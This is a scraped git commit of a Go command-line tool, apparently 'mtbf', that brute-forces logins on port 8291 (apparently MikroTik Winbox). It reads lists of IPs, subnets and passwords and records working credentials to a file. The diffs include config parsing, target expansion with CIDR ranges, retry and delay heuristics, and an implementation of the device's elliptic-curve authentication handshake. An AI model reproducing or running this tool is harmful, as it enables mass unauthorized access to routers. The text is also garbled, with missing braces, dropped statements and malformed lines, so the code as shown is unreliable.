Dave S. 2 years ago
commit b76c6dda70
  1. 11
  2. 139
  3. 343
  4. 51
  5. 103
  6. 103
  7. 587
  8. 5
  9. 2
  10. 439
  11. 91
  12. 132
  13. 16
  14. 384
  15. 46
  16. 29
  17. 288
  18. 285
  19. 112
  20. 193

.gitignore vendored

@ -0,0 +1,11 @@

@ -0,0 +1,139 @@
package main
import (
type bigint struct {
v *big.Int
func (x bigint) Add(y bigint) bigint {
return bigint{v: new(big.Int).Add(x.v, y.v)}
func (x bigint) AddInt(y int) bigint {
return bigint{v: new(big.Int).Add(x.v, big.NewInt(int64(y)))}
func (x bigint) Sub(y bigint) bigint {
return bigint{v: new(big.Int).Sub(x.v, y.v)}
func (x bigint) SubInt(y int) bigint {
return bigint{v: new(big.Int).Sub(x.v, big.NewInt(int64(y)))}
func (x bigint) Mul(y bigint) bigint {
return bigint{v: new(big.Int).Mul(x.v, y.v)}
func (x bigint) MulInt(y int) bigint {
return bigint{v: new(big.Int).Mul(x.v, big.NewInt(int64(y)))}
func (x bigint) Div(y bigint) bigint {
return bigint{v: new(big.Int).Div(x.v, y.v)}
func (x bigint) DivInt(y int) bigint {
return bigint{v: new(big.Int).Div(x.v, big.NewInt(int64(y)))}
func (x bigint) Mod(y bigint) bigint {
return bigint{v: new(big.Int).Mod(x.v, y.v)}
func (x bigint) ModInt(y int) bigint {
return bigint{v: new(big.Int).Mod(x.v, big.NewInt(int64(y)))}
func (x bigint) Pow(y bigint) bigint {
return bigint{v: new(big.Int).Exp(x.v, y.v, nil)}
func (x bigint) PowInt(y int) bigint {
return bigint{v: new(big.Int).Exp(x.v, big.NewInt(int64(y)), nil)}
func (x bigint) And(y bigint) bigint {
return bigint{v: new(big.Int).And(x.v, y.v)}
func (x bigint) AndInt(y int) bigint {
return bigint{v: new(big.Int).And(x.v, big.NewInt(int64(y)))}
func (x bigint) Neg() bigint {
return bigint{v: new(big.Int).Neg(x.v)}
func (x bigint) Empty() bool {
return x.v == nil || x.v.Sign() == 0
func (x bigint) ModExp(y, m bigint) bigint {
return bigint{v: new(big.Int).Exp(x.v, y.v, m.v)}
func (x bigint) Eq(y bigint) bool {
return x.v.Cmp(y.v) == 0
func (x bigint) EqInt(y int) bool {
return x.v.Cmp(big.NewInt(int64(y))) == 0
func (x bigint) Ne(y bigint) bool {
return x.v.Cmp(y.v) != 0
func (x bigint) NeInt(y int) bool {
return x.v.Cmp(big.NewInt(int64(y))) != 0
func (x bigint) Lt(y bigint) bool {
return x.v.Cmp(y.v) < 0
func (x bigint) LtInt(y int) bool {
return x.v.Cmp(big.NewInt(int64(y))) < 0
func (x bigint) Gt(y bigint) bool {
return x.v.Cmp(y.v) > 0
func (x bigint) GtInt(y int) bool {
return x.v.Cmp(big.NewInt(int64(y))) > 0
func (x bigint) Lte(y bigint) bool {
return x.v.Cmp(y.v) <= 0
func (x bigint) LteInt(y int) bool {
return x.v.Cmp(big.NewInt(int64(y))) <= 0
func (x bigint) Gte(y bigint) bool {
return x.v.Cmp(y.v) >= 0
func (x bigint) GteInt(y int) bool {
return x.v.Cmp(big.NewInt(int64(y))) >= 0
func (x bigint) ToBytes(n int) []byte {
res := make([]byte, n)
return x.v.FillBytes(res)
func NewBigint(x int) bigint {
bi := bigint{}
bi.v = big.NewInt(int64(x))
return bi
func NewEmptyBigint() bigint {
return bigint{v: nil}
func NewBigintFromString(s string, p int) bigint {
bi := bigint{}
bi.v, _ = new(big.Int).SetString(s, p)
return bi
func NewBigintFromBytes(b []byte) bigint {
bi := bigint{}
bi.v = new(big.Int).SetBytes(b)
return bi

@ -0,0 +1,343 @@
package main
import (
// ConfigParameterOptions represents additional options for a ConfigParameter.
type ConfigParameterOptions struct {
sw, hidden, command bool
callback func()
// ConfigParameter represents a single configuration parameter.
type ConfigParameter struct {
name string // duplicated in configMap, but also saved here for convenience
value, def interface{} // value and default value
description string // description for this parameter
parsed bool // true if it was successfully parsed from commandline
opts ConfigParameterOptions
var configMap map[string]ConfigParameter = make(map[string]ConfigParameter, 16)
var configAliasMap map[string]string = make(map[string]string, 4)
var ConfigParsingFinished bool = false
// registration
func genericRegister(name string, def interface{}, description string, opts ConfigParameterOptions) {
name = strings.ToLower(name)
_, ok := configMap[name]
failIf(ok, "cannot register config parameter (already exists): \"%v\"", name)
_, ok = configAliasMap[name]
failIf(ok, "cannot register config parameter (already exists as an alias): \"%v\"", name)
failIf(opts.command && opts.callback == nil, "\"%v\" is defined as a command but callback is missing", name)
p := ConfigParameter{} = name
p.value = def
p.def = def
p.description = description
p.opts = opts
configMap[name] = p
func CfgRegister(name string, def interface{}, description string) {
genericRegister(name, def, description, ConfigParameterOptions{})
func CfgRegisterEx(name string, def interface{}, description string, options ConfigParameterOptions) {
genericRegister(name, def, description, options)
func CfgRegisterCallback(name string, def interface{}, description string, callback func()) {
genericRegister(name, def, description, ConfigParameterOptions{callback: callback})
func CfgRegisterCommand(name string, description string, callback func()) {
genericRegister(name, false, description, ConfigParameterOptions{command: true, callback: callback})
func CfgRegisterSwitch(name string, description string) {
genericRegister(name, false, description, ConfigParameterOptions{sw: true})
func CfgRegisterHidden(name string, def interface{}) {
genericRegister(name, def, "", ConfigParameterOptions{hidden: true})
func CfgRegisterAlias(alias, target string) {
alias, target = strings.ToLower(alias), strings.ToLower(target)
_, ok := configAliasMap[alias]
failIf(ok, "cannot register alias (already exists): \"%v\"", alias)
_, ok = configMap[alias]
failIf(ok, "cannot register alias (already exists as a config parameter): \"%v\"", alias)
_, ok = configMap[target]
failIf(!ok, "cannot register alias \"%v\": target \"%v\" does not exist", alias, target)
configAliasMap[alias] = target
// acquisition
func CfgGet(name string) interface{} {
name = strings.ToLower(name)
parm, ok := configMap[name]
failIf(!ok, "unknown config parameter: \"%v\"", name)
if parm.opts.sw {
return parm.parsed // switches always return true if they were parsed
} else if parm.parsed || parm.opts.hidden {
return parm.value // parsed and hidden parms return their current value
} else {
return parm.def // otherwise, use default value
func CfgGetInt(name string) int {
return CfgGet(name).(int)
func CfgGetFloat(name string) float64 {
return CfgGet(name).(float64)
func CfgGetIntSlice(name string) []int {
return CfgGet(name).([]int)
func CfgGetBool(name string) bool {
return CfgGet(name).(bool)
func CfgGetSwitch(name string) bool {
return CfgGet(name).(bool)
func CfgGetString(name string) string {
return CfgGet(name).(string)
func CfgGetStringSlice(name string) []string {
return CfgGet(name).([]string)
func CfgGetDurationMS(name string) time.Duration {
tm := CfgGet(name).(int)
failIf(tm < -1, "\"%v\" can only be set to -1 or a positive value", name)
if tm == -1 {
tm = 0
return time.Duration(tm) * time.Millisecond
// setting
func CfgSet(name string, value interface{}) {
name = strings.ToLower(name)
parm, ok := configMap[name]
failIf(!ok, "unknown config parameter: \"%v\"", name)
failIf(!parm.opts.hidden, "tried to set \"%v\", but it is not a hidden parameter", name)
parm.value = value
if parm.opts.callback != nil {
configMap[name] = parm
// parsing
// getCmdlineParm returns a trimmed commandline parameter with specified index.
func getCmdlineParm(i int) string {
return strings.TrimSpace(os.Args[i])
// isSlice checks if a ConfigParameter value is a slice.
func (parm *ConfigParameter) isSlice() bool {
switch parm.value.(type) {
case []int, []uint, []string:
return true
return false
// writeParmValue saves raw commandline value into a ConfigParameter.
func (parm *ConfigParameter) writeParmValue(value string) {
var err error
switch parm.value.(type) {
case bool:
parm.value, err = strconv.ParseBool(value)
failIf(err != nil, "config parameter \"%v\" must be a boolean",
case int:
v, err := strconv.ParseInt(value, 10, 0)
failIf(err != nil, "config parameter \"%v\" must be an integer",
parm.value = int(v)
case uint:
v, err := strconv.ParseUint(value, 10, 0)
failIf(err != nil, "config parameter \"%v\" must be an unsigned integer",
parm.value = uint(v)
case string:
parm.value = value
case []bool:
b, err := strconv.ParseBool(value)
failIf(err != nil, "config parameter \"%v\" must be a boolean",
parm.value = append(parm.value.([]bool), b)
case []int:
i, err := strconv.ParseInt(value, 10, 0)
failIf(err != nil, "config parameter \"%v\" must be an integer",
parm.value = append(parm.value.([]int), int(i))
case []uint:
u, err := strconv.ParseUint(value, 10, 0)
failIf(err != nil, "config parameter \"%v\" must be an unsigned integer",
parm.value = append(parm.value.([]uint), uint(u))
case []string:
parm.value = append(parm.value.([]string), value)
fail("unknown config parameter \"%v\" type: %T",, parm.value)
// finalizeParm marks a ConfigParameter as parsed, adds it to a global config map
// and calls its callback, if one is present.
func (parm *ConfigParameter) finalizeParm() {
parm.parsed = true
configMap[] = *parm
if parm.opts.callback != nil {
log("cfg", 2, "parse: %T \"%v\" -> def %v, now %v", parm.value,, parm.def, parm.value)
func parseAppConfig() {
log("cfg", 1, "parsing config")
totalFinalized := 0
for i := 1; i < len(os.Args); i++ {
arg := getCmdlineParm(i)
if len(arg) == 0 {
failIf(arg[0] != '-', "\"%v\" is not a commandline parameter", arg)
arg = strings.TrimPrefix(arg, "-")
arg = strings.TrimPrefix(arg, "-")
failIf(len(arg) == 0, "\"%v\" is not a commandline parameter", getCmdlineParm(i))
parm, ok := configMap[strings.ToLower(arg)]
if !ok {
alias, ok := configAliasMap[strings.ToLower(arg)]
failIf(!ok, "unknown commandline parameter: \"%v\"", arg)
parm, ok = configMap[alias]
failIf(!ok, "alias \"%v\" references unknown commandline parameter", arg)
log("cfg", 3, "\"%v\" is aliased to \"%v\"", alias,
failIf(parm.opts.hidden, "\"%v\" is not a commandline parameter", getCmdlineParm(i))
failIf(parm.parsed && !parm.isSlice(), "multiple occurrences of commandline parameter \"%v\" are not allowed",
if !parm.opts.command {
if parm.opts.sw {
} else {
log("cfg", 1, "parsed %v commandline parameters", totalFinalized)
ConfigParsingFinished = true
func showHelp() {
log("", 0, "options:")
parms := make([]string, 0, len(configMap))
for key := range configMap {
parms = append(parms, key)
for _, parmName := range parms {
parm := configMap[parmName]
if parm.opts.hidden {
header := "-" +
if len( > 1 {
header = "-" + header
aliases := []string{}
for alias, target := range configAliasMap {
if target == {
if len(alias) == 1 {
aliases = append(aliases, "-"+alias)
} else {
aliases = append(aliases, "--"+alias)
if len(aliases) > 0 {
header = header + " (aliases: " + strings.Join(aliases, ", ") + ")"
header = header + ":"
description := " (description missing)"
if parm.description != "" {
description = " " + parm.description
if parm.opts.command || parm.opts.sw {
log("", 0, "%s\n%s", header, description)
} else {
log("", 0, "%s\n%s\n default: %v", header, description, parm.value)
log("", 0, "")
log("", 0, "examples:")
log("", 0, " single target:")
log("", 0, " ./mtbf --ip --port 8291 --login admin --password 12345678 --out-file good.txt")
log("", 0, " multiple targets with multiple passwords:")
log("", 0, " ./mtbf --ip-list ips.txt --port 8291 --login admin --password-list passwords.txt --out-file good.txt")
func init() {
CfgRegisterCommand("help", "show program usage", showHelp)
CfgRegisterAlias("?", "help")
CfgRegisterAlias("h", "help")

@ -0,0 +1,51 @@
package main
import (
// Connection represents a network socket.
type Connection struct {
dialer net.Dialer
socket net.Conn
connectTimeout time.Duration
readTimeout time.Duration
protocol string
// NewConnection creates a Connection object.
func NewConnection() *Connection {
conn := Connection{}
conn.connectTimeout = CfgGetDurationMS("connect-timeout-ms")
conn.readTimeout = CfgGetDurationMS("read-timeout-ms")
conn.protocol = "tcp"
return &conn
// Connect initiates a connection to an Endpoint.
func (conn *Connection) Connect(endpoint *Endpoint) (err error) {
conn.dialer = net.Dialer{Timeout: conn.connectTimeout, KeepAlive: -1}
conn.socket, err = conn.dialer.Dial(conn.protocol, endpoint.String())
if err != nil {
log("conn", 2, "cannot connect to \"%v\": %v", endpoint, err.Error())
return err
// SetConnectTimeout sets a custom connect timeout on a Connection.
func (conn *Connection) SetConnectTimeout(timeout time.Duration) {
conn.connectTimeout = timeout
// SetReadTimeout sets a custom read timeout on a Connection.
func (conn *Connection) SetReadTimeout(timeout time.Duration) {
conn.readTimeout = timeout
// Send writes data to a Connection.
func (conn *Connection) Send(data []byte) {

@ -0,0 +1,103 @@
package main
import (
cryptoRand "crypto/rand"
mathRand "math/rand"
func getSHA1Digest(data []byte) []byte {
array := sha1.Sum(data)
return array[:]
func getSHA2Digest(data []byte) []byte {
array := sha256.Sum256(data)
return array[:]
func HKDF(data []byte) []byte {
h := hmac.New(sha1.New, []byte(strings.Repeat("\x00", 64)))
h1 := h.Sum(nil)
h2 := make([]byte, 0)
res := make([]byte, 0)
for i := 0; i < 2; i++ {
h = hmac.New(sha1.New, h1)
h.Write([]byte{byte(i) + 1})
h2 = h.Sum(nil)
res = append(res, h2...)
return res[:0x24]
func genStreamKeys(server bool, data []byte) (sendAESKey, sendHMACKey, receiveAESKey, receiveHMACKey []byte) {
const magic2 = "On the client side, this is the send key; on the server side, it is the receive key."
const magic3 = "On the client side, this is the receive key; on the server side, it is the send key."
var txEnc, rxEnc []byte
txEnc = append(data, []byte(strings.Repeat("\x00", 40))...)
rxEnc = append(data, []byte(strings.Repeat("\x00", 40))...)
if server {
txEnc = append(txEnc, magic3...)
rxEnc = append(rxEnc, magic2...)
} else {
txEnc = append(txEnc, magic2...)
rxEnc = append(rxEnc, magic3...)
txEnc = append(txEnc, []byte(strings.Repeat("\xF2", 40))...)
rxEnc = append(rxEnc, []byte(strings.Repeat("\xF2", 40))...)
txEnc = getSHA1Digest(txEnc)[:16]
rxEnc = getSHA1Digest(rxEnc)[:16]
sendKey := HKDF(txEnc)
sendAESKey = sendKey[:16]
sendHMACKey = sendKey[16:]
receiveKey := HKDF(rxEnc)
receiveAESKey = receiveKey[:16]
receiveHMACKey = receiveKey[16:]
return sendAESKey, sendHMACKey, receiveAESKey, receiveHMACKey
func genPasswordValidatorPriv(username, password string, salt []byte) []byte {
if len(salt) != 16 {
panic("salt must be 16 bytes")
hash := getSHA2Digest([]byte(username + ":" + password))
return getSHA2Digest(append(salt, hash...))
func genRandomBytes(n int) ([]byte, error) {
b := make([]byte, n)
var err error
if CfgGetSwitch("crypt-predictable-rng") {
_, err = mathRand.Read(b)
} else {
_, err = cryptoRand.Read(b)
if err != nil {
return nil, err
return b, nil
func init() {
CfgRegisterSwitch("crypt-predictable-rng", "disable secure rng and use a pseudorandom preseeded rng")

@ -0,0 +1,103 @@
package main
type WCurve struct {
p, r, a, b, h bigint
g *JacobiPoint
montA, conversionFromM bigint
conversion bigint
func NewWCurve() *WCurve {
curve := WCurve{}
curve.p = NewBigintFromString("7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffed", 16)
curve.r = NewBigintFromString("1000000000000000000000000000000014def9dea2f79cd65812631a5cf5d3ed", 16)
curve.montA = NewBigintFromString("486662", 10)
curve.a = NewBigintFromString("2aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa984914a144", 16)
curve.b = NewBigintFromString("7b425ed097b425ed097b425ed097b425ed097b425ed097b4260b5e9c7710c864", 16)
curve.h = NewBigintFromString("8", 10)
curve.conversionFromM = curve.montA.Mul(modinv(NewBigint(3), curve.p)).Mod(curve.p)
curve.conversion = curve.p.Sub(curve.montA.Mul(modinv(NewBigint(3), curve.p))).Mod(curve.p)
curve.g = curve.liftX(NewBigint(9), false)
return &curve
func (curve *WCurve) Eq(other *WCurve) bool {
return curve.p.Eq(other.p) &&
curve.a.Mod(curve.p).Eq(other.a.Mod(curve.p)) &&
func (curve *WCurve) containsPoint(x, y bigint) bool {
p1 := x.Mul(x).Add(curve.a).Mul(x).Add(curve.b)
return y.Mul(y).Sub(p1).Mod(curve.p).EqInt(0)
func (curve *WCurve) genPublicKey(priv []byte) (pub []byte, parity bool) {
if len(priv) != 32 {
panic("invalid private key length")
p := NewBigintFromBytes(priv)
pt := curve.g.Mul(p)
return curve.toMontgomery(pt)
func (self *WCurve) toMontgomery(pt *JacobiPoint) (bytes []byte, parity bool) {
x := pt.AffineX().Add(self.conversion).Mod(self.p)
return x.ToBytes(32), pt.AffineY().AndInt(1).EqInt(1)
func (self *WCurve) liftX(x bigint, parity bool) *JacobiPoint {
x = x.Mod(self.p)
ySquared := x.Mul(x).Mul(x).Add(self.montA.Mul(x).Mul(x).Add(x)).Mod(self.p)
x = x.Add(self.conversionFromM).Mod(self.p)
ys0, ys1 := primeModSqrt(ySquared, self.p)
if ys0.Empty() && ys1.Empty() {
return nil
} else {
pt1 := NewJacobiPoint(self, x, ys0, NewBigint(1), self.r)
pt2 := NewJacobiPoint(self, x, ys1, NewBigint(1), self.r)
if pt1.AffineY().AndInt(1).EqInt(1) && parity {
return pt1
} else if pt2.AffineY().AndInt(1).EqInt(1) && parity {
return pt2
} else if pt1.AffineY().AndInt(1).EqInt(0) && !parity {
return pt1
} else {
return pt2
func (self *WCurve) redp1(bytes []byte, parity bool) *JacobiPoint {
x := getSHA2Digest(bytes)
for {
x2 := getSHA2Digest(x)
pt := self.liftX(NewBigintFromBytes(x2), parity)
if pt == nil {
x = NewBigintFromBytes(x).AddInt(1).ToBytes(32)
} else {
return pt
func (self *WCurve) check(a *JacobiPoint) bool {
ax := a.AffineX()
ay := a.AffineY()
left := ay.Mul(ay).Mod(self.p)
right := ax.Mul(ax).Mul(ax).Add(self.a.Mul(ax)).Add(self.b).Mod(self.p)
return left.Eq(right)
func (self *WCurve) multiplyByG(a bigint) *JacobiPoint {
return self.g.Mul(a)
func (self *WCurve) finiteFieldValue(a bigint) bigint {
return a.Mod(self.r)

@ -0,0 +1,587 @@
package main
import (
type Address struct {
ip string // TODO: switch to a static 16-byte array
port int
v6 bool
type Endpoint struct {
addr Address
loginPos SourcePos
passwordPos SourcePos
delayUntil time.Time
normalList *list.Element
delayedList *list.Element
goodConn int
badConn int
consecutiveGoodConn int
consecutiveBadConn int
protoErrors int
consecutiveProtoErrors int
readErrors int
consecutiveReadErrors int
mutex sync.Mutex
deleted bool // set to TRUE to mark this endpoint as deleted
// unused, for now
rtt float32
heuristicBanAPS int
heuristicBanPPS int
lastPacketAt time.Time // when was the last packet sent?
lastAttemptAt time.Time // same, but for attempts
var endpoints *list.List // Contains all active endpoints
var delayedEndpoints *list.List // Contains endpoints that got delayed
// A mutex for synchronizing Endpoint collections.
var globalEndpointMutex sync.Mutex
// String transforms an Endpoint to a string representation compatible with Dialer interface.
func (e *Endpoint) String() string {
if e.addr.v6 {
return "[" + e.addr.ip + "]:" + strconv.Itoa(e.addr.port)
} else {
return e.addr.ip + ":" + strconv.Itoa(e.addr.port)
// Delete deletes an endpoint from global storage.
// This method assumes that Endpoint's mutex was already taken.
func (e *Endpoint) Delete() {
defer globalEndpointMutex.Unlock()
e.delayUntil = time.Time{}
if e.delayedList != nil {
log("ep", 3, "deleting delayed endpoint \"%v\"", e)
e.delayedList = nil
if e.normalList != nil {
log("ep", 3, "deleting endpoint \"%v\"", e)
e.normalList = nil
e.deleted = true
// Delay marks an Endpoint as "delayed" with the specified time duration
// and causes it to move to the delayed queue.
// This method assumes that Endpoint's mutex was already taken.
func (e *Endpoint) Delay(addTime time.Duration) {
if e.deleted {
log("ep", 5, "delaying endpoint \"%v\" for %v", e, addTime)
e.delayUntil = time.Now().Add(addTime)
// MigrateToDelayed moves an Endpoint to a delayed queue.
// Endpoint mutex is assumed to be taken.
func (e *Endpoint) MigrateToDelayed() {
defer endpointMutex.Unlock()
if e.delayedList != nil {
// already in a delayed list
log("ep", 5, "cannot migrate endpoint \"%v\" to delayed list: already in the list", e)
} else {
log("ep", 5, "migrating endpoint \"%v\" to delayed list", e)
e.delayedList = delayedEndpoints.PushBack(e)
if e.normalList != nil {
e.normalList = nil
// MigrateToNormal moves an Endpoint to a normal queue.
// Endpoint mutex is assumed to be taken.
func (e *Endpoint) MigrateToNormal() {
defer endpointMutex.Unlock()
if e.normalList != nil {
log("ep", 5, "cannot migrate endpoint \"%v\" to normal list: already in the list", e)
} else {
log("ep", 5, "migrating endpoint \"%v\" to normal list", e)
e.normalList = endpoints.PushBack(e)
if e.delayedList != nil {
e.delayedList = nil
// SkipLogin gets the endpoint's current login,
// compares it with user-defined login and skips (advances) it if
// both logins are equal.
func (e *Endpoint) SkipLogin(login) {
// attempt to fetch next login
curLogin, empty := SrcLogin.FetchOne(&e.loginPos, false)
if curLogin == login && !empty { // this login has not yet been exhausted?
// reset password pos
// fetch but ignore result
SrcLogin.FetchOne(&e.loginPos, true)
log("ep", 3, "advanced to next login for \"%v\"", e)
// NoResponse is an event handler that gets called when
// an Endpoint does not respond to a connection request.
func (e *Endpoint) NoResponse() bool {
defer e.mutex.Unlock()
if e.consecutiveGoodConn == 0 {
} else {
e.consecutiveGoodConn = 0
e.consecutiveBadConn = 1
// 1. always bail after X consecutive bad conns
if e.consecutiveBadConn >= CfgGetInt("max-bad-conn") {
log("ep", 3, "deleting \"%v\" due to max-bad-conn", e)
return false
// 2. after a good conn, always allow at most X bad conns
if e.goodConn > 0 && e.consecutiveBadConn <= CfgGetInt("max-bad-after-good-conn") {
log("ep", 3, "keeping \"%v\" around due to max-bad-after-good-conn", e)
return true
// 3. always allow at most X bad conns
if e.consecutiveBadConn < CfgGetInt("min-bad-conn") {
log("ep", 3, "keeping \"%v\" around due to min-bad-conn", e)
return true
// 4. bad conn/good conn ratio must not be higher than X
if e.goodConn > 0 && (float64(e.badConn)/float64(e.goodConn)) <= CfgGetFloat("conn-ratio") {
log("ep", 3, "keeping \"%v\" around due to conn-ratio", e)
return true
// otherwise, just delete it
log("ep", 3, "deleting \"%v\" due to no applicable grace conditions", e)
return false
// ProtocolError is an event handler that gets called when
// an Endpoint responds with wrong or missing data.
func (e *Endpoint) ProtocolError() bool {
defer e.mutex.Unlock()
// 1. always bail after X consecutive protocol errors
if e.consecutiveProtoErrors >= CfgGetInt("max-proto-errors") {
log("ep", 3, "deleting \"%v\" due to max-proto-errors", e)
return false
// 2. always allow at most X consecutive protocol errors
if e.consecutiveProtoErrors < CfgGetInt("min-proto-errors") {
log("ep", 3, "keeping \"%v\" around due to min-proto-errors", e)
return true
// 3. bad conn/good conn ratio must not be higher than X
if e.goodConn > 0 && (float64(e.protoErrors)/float64(e.goodConn)) <= CfgGetFloat("proto-error-ratio") {
log("ep", 3, "keeping \"%v\" around due to proto-error-ratio", e)
return true
// otherwise, just delete it
log("ep", 3, "deleting \"%v\" due to no applicable grace conditions", e)
return false
// Bad is an event handler that gets called when
// an authentication attempt to an Endpoint fails.
func (e *Endpoint) Bad() {
defer e.mutex.Unlock()
e.consecutiveProtoErrors = 0
// The endpoint may be in delayed queue, so push it back to the normal queue.
// Good is an event handler that gets called when
// an authentication attempt to an Endpoint succeeds.
func (e *Endpoint) Good(login) {
defer e.mutex.Unlock()
e.consecutiveProtoErrors = 0
if !CfgGetSwitch("keep-endpoint-on-good") {
} else {
// Connected is an event handler that gets called when
// a connection attempt to an Endpoint succeeds.
func (e *Endpoint) Connected() {
defer e.mutex.Unlock()
if e.consecutiveBadConn == 0 {
} else {
e.consecutiveBadConn = 0
e.consecutiveGoodConn = 1
// NoSuchLogin is an event handler that gets called when
// a service module determines that a login does not present
// on an Endpoint and therefore can be excluded from processing.
func (e *Endpoint) NoSuchLogin(login string) {
defer e.mutex.Unlock()
// EventWithParm tells an Endpoint that something important has happened,
// or a hint has been acquired.
// It is normally called from a Task handler.
// Returns False if an event resulted in a deletion of its Endpoint.
func (e *Endpoint) EventWithParm(event TaskEvent, parm any) bool {
log("ep", 4, "endpoint event for \"%v\": %v", e, event)
if event == TE_Generic {
return true // do not process generic events
switch event {
case TE_NoResponse:
return e.NoResponse()
case TE_ProtocolError:
return e.ProtocolError()
case TE_Good:
return false
case TE_Bad:
case TN_Connected:
case TH_NoSuchLogin:
return true // keep this endpoint
// Event is a parameterless version of EventWithParm.
func (e *Endpoint) Event(event TaskEvent) bool {
return e.EventWithParm(event, 0)
// Exhausted gets called when an endpoint no longer has any valid logins and passwords,
// thus it may be deleted.
func (e *Endpoint) Exhausted() {
defer e.mutex.Unlock()
// GetDelayedEndpoint retrieves an Endpoint from the delayed list.
func GetDelayedEndpoint() (e *Endpoint, waitTime time.Duration) {
currentTime := time.Now()
if delayedEndpoints.Empty() {
log("ep", 5, "delayed endpoint list is empty")
return nil, 0
it := delayedEndpoints.IteratorAt(delayedEndpoints.Left())
for {
k, v := it.Key().(time.Time), it.Value().(*Endpoint)
if v == nil {
log("ep", 5, "!!! empty delayed endpoint!!!")
return nil, 0
if k.After(currentTime) {
log("ep", 5, "no delayed endpoints can be processed at this time")
return nil, k.Sub(currentTime)
if k.Before(v.delayUntil) {
log("ep", 5, "delayed endpoint was re-delayed: removing lingering definition")
defer delayedEndpoints.Remove(k)
if v.delayUntil.IsZero() {
log("ep", 5, "delayed endpoint is already in normal queue: removing lingering definition")
defer delayedEndpoints.Remove(k)
defer delayedEndpoints.Remove(k)
return v, 0
log("ep", 5, "delayed endpoint list was holding only lingering definitions and is now empty")
return nil, 0
// FetchEndpoint retrieves an endpoint: first, a delayed RB tree is queried,
// then, if nothing is found, a normal list is searched,
// and (TODO) if this list is empty or will soon be emptied,
// a new batch of endpoints gets created.
func FetchEndpoint() (e *Endpoint, waitTime time.Duration) {
defer endpointMutex.Unlock()
e, waitTime = GetDelayedEndpoint()
if e != nil {
log("ep", 4, "fetched a delayed endpoint: \"%v\"", e)
return e, 0
el := endpoints.Front()
if el == nil {
if waitTime == 0 {
log("ep", 1, "out of endpoints")
return nil, 0
log("ep", 4, "all endpoints are delayed, waiting for %v", waitTime)
return nil, waitTime
e = el.Value.(*Endpoint)
log("ep", 4, "fetched an endpoint: \"%v\"", e)
return e, 0
// Safety feature, to avoid expanding subnets into a huge amount of IPs.
const maxNetmaskSize = 22 // expands into /10 for IPv4
// RegisterEndpoint builds an Endpoint and puts it to a global list of endpoints.
func RegisterEndpoint(ip string, ports []int, isIPv6 bool) int {
for _, port := range ports {
ep := Endpoint{addr: Address{ip: ip, port: port, v6: isIPv6}}
ep.listElement = endpoints.PushBack(&ep)
log("ep", 3, "ok registered: %v", &ep)
return len(ports)
func incIP(ip net.IP) {
for j := len(ip) - 1; j >= 0; j-- {
if ip[j] > 0 {
func parseCIDR(ip string, ports []int, isIPv6 bool) int {
na, nm, err := net.ParseCIDR(ip)
if err != nil {
log("ep", 0, "failed to parse CIDR notation for \"%v\": %v", ip, err.Error())
return 0
mask, maskBits := nm.Mask.Size()
if mask < maskBits-maxNetmaskSize {
log("ep", 0, "ignoring out of safe bounds CIDR netmask for \"%v\": %v (max: %v, allowed: %v)", ip, mask, maskBits, maxNetmaskSize)
return 0
curHost := 0
maxHost := 1<<(maskBits-mask) - 1
numParsed := 0
strict := CfgGetSwitch("strict-subnets")
log("ep", 2, "expanding CIDR: \"%v\" to %v hosts", ip, maxHost+1)
for expIP := na.Mask(nm.Mask); nm.Contains(expIP); incIP(expIP) {
if strict && (curHost == 0 || curHost == maxHost) && maskBits-mask >= 2 {
log("ep", 1, "ignoring network/broadcast address due to strict-subnets: \"%v\"", expIP.String())
} else {
numParsed += parseIPPorts(expIP.String(), ports, isIPv6)
return numParsed
func parseIPPorts(ip string, ports []int, isIPv6 bool) int {
// ip may be a domain name, a CIDR subnet or an IP address
// CIDR subnets must be expanded to plain IPs
if strings.LastIndex(ip, "/") >= 0 { // this is a CIDR subnet
return parseCIDR(ip, ports, isIPv6)
} else if strings.Count(ip, "/") > 1 { // invalid CIDR notation
log("ep", 0, "invalid CIDR subnet format: \"%v\", ignoring", ip)
return 0
} else { // otherwise, just register
return RegisterEndpoint(ip, ports, isIPv6)
func extractIPAndPort(str string, skippedIPv6 *int) (ip string, port int, err error) {
var portString string
ip, portString, err = net.SplitHostPort(str)
if err != nil {
return "", 0, err
port, err = strconv.Atoi(portString)
if err != nil {
return "", 0, err
if port <= 0 || port > 65535 {
return "", 0, errors.New("invalid port: " + strconv.Itoa(port))
return ip, port, nil
func ParseEndpoints(source []string) {
log("ep", 1, "parsing endpoints")
totalIPv6Skipped := 0
numParsed := 0
for _, str := range source {
if !strings.Contains(str, ":") {
// no ":": this is an ipv4/dn without port,
// parse it with all known ports
numParsed += parseIPPorts(str, CfgGetIntSlice("port"), false)
} else {
// either ipv4/dn with port, or ipv6 with/without port
isIPv6 := strings.Count(str, ":") > 1
if isIPv6 && CfgGetSwitch("no-ipv6") {
log("ep", 1, "skipping ipv6 target \"%v\" due to no-ipv6", str)
if !strings.Contains(str, "]:") && strings.Contains(str, "::") {
// ipv6 without port
numParsed += parseIPPorts(str, CfgGetIntSlice("port"), true)
ip, port, err := extractIPAndPort(str, &totalIPv6Skipped)
if err != nil {
log("ep", 0, "failed to extract ip/port for \"%v\": %v", str, err.Error())
ports := []int{port}
// append all default ports
if CfgGetSwitch("append-default-ports") {
for _, port2 := range CfgGetIntSlice("port") {
if port != port2 {
ports = append(ports, port2)
numParsed += parseIPPorts(ip, ports, isIPv6)
logIf(totalIPv6Skipped > 0, "ep", 0, "skipping %v IPv6 targets due to no-ipv6 flag", totalIPv6Skipped)
log("ep", 1, "finished parsing endpoints: got %v, total %v", numParsed, endpoints.Len())
func init() {
endpoints = list.New()
delayedEndpoints = list.New()
CfgRegister("port", []int{8291}, "one or more default ports")
CfgRegister("max-aps", 5, "maximum number of attempts per second for an endpoint")
CfgRegisterSwitch("no-ipv6", "skip IPv6 entries")
CfgRegisterSwitch("append-default-ports", "always append default ports even for targets in host:port format")
CfgRegisterSwitch("strict-subnets", "strict subnet behaviour: ignore network and broadcast addresses in /30 and bigger subnets")
CfgRegisterSwitch("keep-endpoint-on-good", "keep processing endpoint if a login/password was found")
CfgRegister("conn-ratio", 0.15, "keep a failed endpoint if its bad/good connection ratio is lower than this value")
CfgRegister("max-bad-after-good-conn", 5, "how many consecutive bad connections to allow after a good connection")
CfgRegister("max-bad-conn", 20, "always remove endpoint after this many consecutive bad connections")
CfgRegister("min-bad-conn", 2, "do not consider removing an endpoint if it does not have this many consecutive bad connections")
CfgRegister("proto-error-ratio", 0.25, "keep endpoints with a protocol error if their protocol error ratio is lower than this value")
